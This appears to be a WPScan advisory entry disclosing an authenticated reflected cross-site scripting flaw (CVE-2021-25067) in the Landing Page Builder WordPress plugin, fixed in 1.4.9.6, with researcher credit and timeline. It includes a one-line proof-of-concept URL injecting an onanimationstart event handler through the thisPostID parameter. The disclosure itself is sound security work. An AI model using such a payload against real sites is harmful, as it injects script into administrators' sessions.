WordPress Plugin Vulnerabilities

Landing Page Builder < 1.4.9.6 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin was affected by a reflected XSS in page-builder-add on the  ulpb_post admin page.

Proof of Concept

http://127.0.0.1:8001/wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID="+style=animation-name:rotation+onanimationstart=alert(1)+x=

Affects Plugins

page-builder-add

Fixed in version 1.4.9.6

References

CVE

CVE-2021-25067

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

365007f0-61ac-4e81-8a3a-3a068f2c84bc

Timeline

Publicly Published

2021-12-16 (about 9 months ago)

Added

2021-12-16 (about 9 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin